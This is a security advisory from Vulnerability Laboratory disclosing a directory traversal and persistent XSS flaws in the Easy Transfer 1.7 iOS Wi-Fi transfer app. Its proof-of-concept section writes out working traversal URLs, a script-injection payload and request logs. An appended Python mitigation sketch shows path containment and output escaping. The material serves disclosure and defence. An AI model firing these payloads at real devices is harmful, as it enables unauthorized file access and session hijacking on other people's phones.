# Title: Easy Transfer 1.7 for iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-27
# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
# CVE: N/A

Document Title:
===============
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2223


Common Vulnerability Scoring System:
====================================
7.1


Affected Product(s):
====================
Rubikon Teknoloji
Product: Easy Transfer v1.7 - iOS Mobile Web-Application
(Copy of the Homepage: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078)


Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
1.1
A directory traversal web vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 iOS mobile application.
The vulnerability allows remote attackers to change the application path in performed requests to compromise the local
application or file-system of a mobile device. Attackers are, for example, able to request environment variables or a
sensitive system path.

The directory traversal web vulnerability is located in the main application path request performed via the GET method.
Attackers are able to request, for example, the local path variables of the web-server by changing the local path in the
performed request itself. In a first request the attacker changes the path and the host redirects to complete the address
with "..". The attacker then appends "/.." and a final slash to the request, and the path can be accessed via web-browser
to download or list local files.

Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information leakage through unauthorized file access and mobile
application compromise.


1.2
Multiple persistent cross-site scripting vulnerabilities have been discovered in the Easy Transfer Wifi Transfer v1.7 iOS
mobile application. The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent
attack vector to compromise the mobile web-application from the application-side.

The persistent vulnerabilities are located in the "Create Folder" and "Move/Edit" functions. Attackers are able to inject
their own malicious script code into the "oldPath", "newPath" and "path" parameters. The request method to inject is POST
and the attack vector is located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create Folder
[+] Move/Edit

Vulnerable Parameter(s):
[+] oldPath
[+] newPath
[+] path


Proof of Concept (PoC):
=======================
1.1
The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../

[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]


--- PoC Session Logs [GET] --- (list)
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 213
Content-Type: application/json
Connection: Close


1.2
The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
<scriptx00>alert(document.domain)</script>


--- PoC Session Logs [POST] --- (Create & Move)
http://localhost/create
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
path=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2
Content-Type: application/json
Connection: Close
-
http://localhost/move
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Content-Length: 411
Content-Type: text/html; charset=utf-8
Connection: Close
-
[GET] (Execution)
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://localhost/


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


--
VULNERABILITY LABORATORY - RESEARCH TEAM
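
Mitigation sketch for the issues in sections 1.1 and 1.2, added here as an example and not taken from the advisory or the vendor's code: it normalises the "path", "oldPath" and "newPath" values and refuses anything that leaves the share root, and it HTML-escapes stored names when the listing is rendered. SHARE_ROOT and all function names are assumptions made for illustration.

```python
import html
import posixpath
from urllib.parse import unquote

# Hypothetical share root; the advisory does not name the app's real directory.
SHARE_ROOT = "/var/mobile/share"


def resolve_under_root(raw_path, root=SHARE_ROOT):
    """Map a raw `path`/`oldPath`/`newPath` value to a path inside `root`.

    Raises ValueError if the normalised result leaves the root.
    """
    root = posixpath.normpath(root)
    decoded = unquote(raw_path)  # decode exactly once, as the query parser would
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Treat the value as relative to the root, then collapse "." and "..".
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare on a segment boundary so "/share-other" does not pass as "/share".
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes share root")
    # normpath is purely lexical: on a real filesystem, resolve symlinks
    # (os.path.realpath) as well and repeat the containment check.
    return candidate


def is_allowed(raw_path, root=SHARE_ROOT):
    """True if the request path stays inside the share root."""
    try:
        resolve_under_root(raw_path, root)
        return True
    except ValueError:
        return False


def render_entry(path):
    """Build one listing row; every stored value is HTML-escaped on output."""
    name = posixpath.basename(path.rstrip("/"))
    return '<li data-path="{}">{}</li>'.format(
        html.escape(path, quote=True), html.escape(name, quote=True))


if __name__ == "__main__":
    # Constructed inputs; the second has the traversal shape from section 1.1.
    for p in ["/test", "%2F..%2F..%2F..%2F../", "/../share-other/x"]:
        print(p, "->", "allowed" if is_allowed(p) else "rejected")
    print(render_entry('/test/a<b>&"c'))
```

The containment check belongs on every handler that takes a path (list, create, move), and the escaping belongs at the point where names are written into HTML, since names stored before a fix would otherwise still be rendered as markup.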